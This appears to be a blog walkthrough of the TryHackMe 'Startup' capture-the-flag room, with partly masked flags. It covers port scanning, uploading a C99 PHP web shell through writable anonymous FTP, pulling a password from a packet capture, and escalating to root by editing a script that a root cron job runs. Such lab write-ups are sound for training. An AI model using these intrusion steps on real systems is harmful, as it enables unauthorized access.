Having fun with TryHackMe again. So, here is the write up and guideline to pass this challenge.

Room: https://tryhackme.com/room/startup
Level: Easy
Task: Abuse traditional vulnerabilities via untraditional means.

As usual, open the IP in the browser first

No hint or what so ever. Lets see which port open for this IP using NMAP

# nmap -A -T4 10.10.249.X
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 04:02 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 04:53 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.8.163.74
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

There is 3 ports open 21, 22 and 80. Before drill down this port, I need to brute the directory path first using nikto and gobuster

# nikto --host http://10.10.249.X/
....
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...

+ OSVDB-3233: /icons/README: Apache default file found.
....

There is 1 path named files from nikto search

# gobuster -w ~/wordlists/dirbuster/directory-list-2.3-big.txt -u http://10.10.249.X -t 70
... .
/files (Status: 301) /server-status (Status: 403)
....

And also a path named files from gobuster search. From all the info, we can start to do the task

Go to 10.10.X.X/files site.

There is an empty ftp folder. Might check it later. There is notice.txt and important.jpg. Lets open it

Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

Image usually they hide something in it but from online stega decoder, this image doesn’t contain any hidden message. Its okay. Just proceed.

We didn’t check the FTP yet. Using WinSCP for more easier GUI 😁

After a while, I noticed that the ftp file permission is 777. Its writable! I uploaded the C99 php shell into ftp folder. Rename it as index.php.

Lets see the shell page. http://10.10.249.X/files/ftp/

Using the command, find the hint

# ls -al /
...
drwxr-xr-x 2 www-data www-data 4096 Nov 12 04:53 incidents
-rw-r--r-- 1 www-data www-data 136 Nov 12 04:53 recipe.txt
...

Found file name receipe.txt.

# cat /receipt.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was XXXX.

Done task 1.

# ls -al /
...
drwxr-xr-x 2 www-data www-data 4096 Nov 12 04:53 incidents
-rw-r--r-- 1 www-data www-data 136 Nov 12 04:53 recipe.txt
...

Drill down the incidents folder

# ls -al /incidents
-rwxr-xr-x 1 www-data www-data 31224 Nov 12 04:53 suspicious.pcapng

Honestly, I don’t what extension pcapng is. I start googling the extension and its wireshark extension. Download it using C99shell and open using wireshark.

Ok that’s a lot of packets. Lets check one by one

There is a shell request. Follow the HTTP Stream.

Lets filter by IP address and port in wireshark

ip.addr == 192.168.22.139 && tcp.port == 4444

I follow TCP No 35 Stream 7, there is request someone trying to access lennie user. Scroll down, then there is lennie password exposed!

So lets SSH using lennie user

# ssh lennie@10.10.X.X
lennie@10.10.249.157's password:
# ls -al
drwx------ 2 lennie lennie 4096 Mar 2 04:34 .cache
drwxr-xr-x 2 lennie lennie 4096 Nov 12 04:53 Documents
drwxr-xr-x 2 root root 4096 Nov 12 04:54 scripts
-rw-r--r-- 1 lennie lennie 38 Nov 12 04:53 user.txt

Found the 2nd flag!

# cat user.txt
THM{03ce3d619b80ccbXXXXXXXXXXXXXX}

2 down 1 to go……

From the hint, its says “scripts”. When refer to list in lennie directory. There is scripts folder

# ls -al scripts
-rwxr-xr-x 1 root root 77 Nov 12 04:53 planner.sh
-rw-r--r-- 1 root root 1 Mar 2 05:52 startup_list.txt

Both are root. Lets see what inside the shell script

#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

There is another shell triggered inside. Follow the path

# ls -al /etc
...
-rwx------ 1 lennie lennie 60 Mar 2 06:00 print.sh
...

This file is own by lennie which mean if we put the root command inside it, it can be trigger because of planner.sh is executed by root. Since reverse shell is not working in my setup, I edited the print.sh

ls -al /root > /exposed_root.txt

Save and wait for some time because the planner.sh is triggered by cron. After a while, there is the list directory of /root

drwx------  4 root root 4096 Nov 12 04:54 .
drwxr-xr-x 25 root root 4096 Mar 2 05:59 ..
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4096 Nov 12 04:54 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 38 Nov 12 04:53 root.txt
drwx------ 2 root root 4096 Nov 12 04:50 .ssh

So edit again the print.sh and see the root.txt

cat /root/root.tx > /exposed_root.txt

Now root.txt is exposed

THM{f963aaa6a430f21022215XXXXXXXXX}

Mission completed!!!

#Tryhackme #cybersecurity

Software Engineer at Teratotech.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store